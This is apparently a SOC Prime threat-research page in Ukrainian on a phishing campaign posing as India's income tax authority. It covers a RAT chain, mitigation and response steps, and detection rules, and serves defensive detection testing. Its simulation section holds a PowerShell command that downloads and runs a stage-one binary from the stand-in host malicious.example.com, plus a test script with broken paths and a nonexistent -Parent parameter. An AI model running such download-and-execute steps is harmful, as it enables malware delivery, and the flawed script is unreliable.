SOC Prime Bias: Середній

30 Dec 2025 13:29 UTC

Фішингова кампанія імітує Індійський податок на прибуток для атак на бізнес

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon Стежити
Фішингова кампанія імітує Індійський податок на прибуток для атак на бізнес
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Резюме

Операція фішингу, яка імітує Індійське податкове управління, доставляє замінований PDF, який перенаправляє отримувачів на підробний портал відповідності. Сайт запрошує жертву завантажити ZIP-пакет, що містить підписаний NSIS-інсталятор, який потім розгортає багатоступеневий троян для віддаленого доступу. RAT зберігає активність, створюючи службу Windows, і спілкується з кількома серверами C2 через нестандартні порти.

Розслідування

Дослідники проаналізували PDF-пастку, вбудовану URL-адресу та робочий процес ланцюгового інсталятора NSIS. Вони задокументували виконувані файли, що були розміщені на диску, створення прихованої папки з установкою і реєстрацію NSecRTS.exe як служби Windows. У звіті також були захоплені вихідні зв’язки з трьома IP-адресами та підкреслено використання підписаних корисних навантажень по всьому ланцюгу доставки.

Пом’якшення

Заблокуйте зловмисний домен та пов’язані IP-адреси на периметрі та через проксі-контролі. Посильте захист електронної пошти для маркування тем податкової тематики і посилань, що ведуть до порталів, схожих на портали відповідності. Запобігайте автоматичному виконанню неперевірених інсталяторів, де можливо, і контролюйте створення підозрілих служб — особливо тих, що мають назву «Служба захисту в режимі реального часу Windows».

Відповідь

Сигналізуйте про наведені імена файлів, хеші та активність реєстрації сервісів Windows, пов’язаних із ланцюгом інфекцій. Ізолюйте уражені кінцеві точки, отримайте зображення пам’яті та диска, та проведіть повне судово-медичне дослідження, щоб виявити будь-які додаткові стадії RAT або інструменти. Видаліть артефакти збереження та скиньте потенційно скомпрометовані облікові дані, щоб запобігти повторному входу.

Потік атаки

Виявлення

Підозріле командування і контроль через запит DNS незвичного рівня домену верхнього рівня (TLD)

Команда SOC Prime
29 грудня 2025

IOCs (DestinationIP) для виявлення: Фішингова кампанія з темою Індійського податкового управління націлена на місцеві бізнеси

Правила SOC Prime AI
29 грудня 2025

IOCs (SourceIP) для виявлення: Фішингова кампанія з темою Індійського податкового управління націлена на місцеві бізнеси

Правила SOC Prime AI
29 грудня 2025

IOCs (HashMd5) для виявлення: Фішингова кампанія з темою Індійського податкового управління націлена на місцеві бізнеси

Правила SOC Prime AI
29 грудня 2025

Виявлення виконання шкідливого ПЗ у кампанії фішингу з темою Індійського податкового управління [Створення процесу Windows]

Правила SOC Prime AI
29 грудня 2025

Виявлення C2-комунікації NSecRTS.exe [Мережеве підключення Windows]

Правила SOC Prime AI
29 грудня 2025

Виконання симуляції

Передумова: Перевірка телеметрії та базових даних перед польотом повинна бути пройдена.

Мотивування: У цьому розділі детально описується точне виконання техніки зловмисника (TTP), розроблене для активації правила виявлення. Команди та опис ПОВИННІ безпосередньо відображати ідентифіковані TTP і мати на меті створити точну телеметрію, очікувану логікою виявлення.

  • Атака: Нарратив та команди:
    Зловмисник доставляє фішинговий електронний лист під назвою «Податкова повістка». Підключення – це зловмисний документ Word, який скидає setup_Ir5swQ3EpeuBpePEpew=.exe to %TEMP%.Жертва виконує файл, який у свою чергу запускає Sibuia.exe (справжній корисний вантаж) як свій потомок. Цей ланцюг «батько-дитина» спроектований для обходу загальних попереджень про створення процесів, але виявлений правилом Sigma.

    Кроки, які виконуються на скомпрометованому хості:

    1. Скидання бінарного файлу першого етапу:
      $stage1 = "$env:TEMPsetup_Ir5swQ3EpeuBpePEpew=.exe"
      Invoke-WebRequest -Uri "http://malicious.example.com/stage1" -OutFile $stage1
    2. Виконання бінарного файлу першого етапу:
      Start-Process -FilePath $stage1 -NoNewWindow
    3. Бінарний файл першого етапу внутрішньо створює бінарний файл другого етапу Sibuia.exe в тій самій директорії і запускає його: (Симулюється нижченаведеним тестовим скриптом.)
  • Скрипт для регресійного тестування:
    Скрипт нижче відтворює точний зв’язок «батько-дитина», необхідний для спрацювання правила.

    # -------------------------------------------------
    # Симуляція фішингового ланцюга Податкової інспекції Індії
    # -------------------------------------------------
    # Визначення шляхів
    $stage1 = "$env:TEMPsetup_Ir5swQ3EpeuBpePEpew=.exe"
    $stage2 = "$env:TEMPSibuia.exe"
    
    # Створення макетів бінарних файлів (нульові байти — досить для ведення журналу Sysmon)
    Set-Content -Path $stage1 -Value 'REM stage1 placeholder' -Encoding ASCII
    Set-Content -Path $stage2 -Value 'REM stage2 placeholder' -Encoding ASCII
    
    # Переконатися, що файли виконувані (Windows не потребує chmod)
    Write-Host "[*] Запуск stage1..."
    $proc1 = Start-Process -FilePath $stage1 -PassThru
    
    # Дати stage1 момент на "створення" stage2 (симулюється прямим запуском)
    Start-Sleep -Milliseconds 500
    
    Write-Host "[*] Stage1 створює stage2 (Sibuia.exe)..."
    $proc2 = Start-Process -FilePath $stage2 -PassThru -Parent $proc1.Id
    
    Write-Host "[+] Симуляція завершена. Перевірте виявлення в SIEM."
    # -------------------------------------------------
  • Команди для очищення:
    Видалити артефакти та завершити будь-які залишкові процеси.

    # Зупинка будь-яких залишкових процесів
    Get-Process -Name "setup_Ir5swQ3EpeuBpePEpew=" -ErrorAction SilentlyContinue | Stop-Process -Force
    Get-Process -Name "Sibuia" -ErrorAction SilentlyContinue | Stop-Process -Force
    
    # Видалення файлів
    Remove-Item -Path "$env:TEMPsetup_Ir5swQ3EpeuBpePEpew=.exe" -Force -ErrorAction SilentlyContinue
    Remove-Item -Path "$env:TEMPSibuia.exe" -Force -ErrorAction SilentlyContinue
    
    Write-Host "[*] Очищення завершено."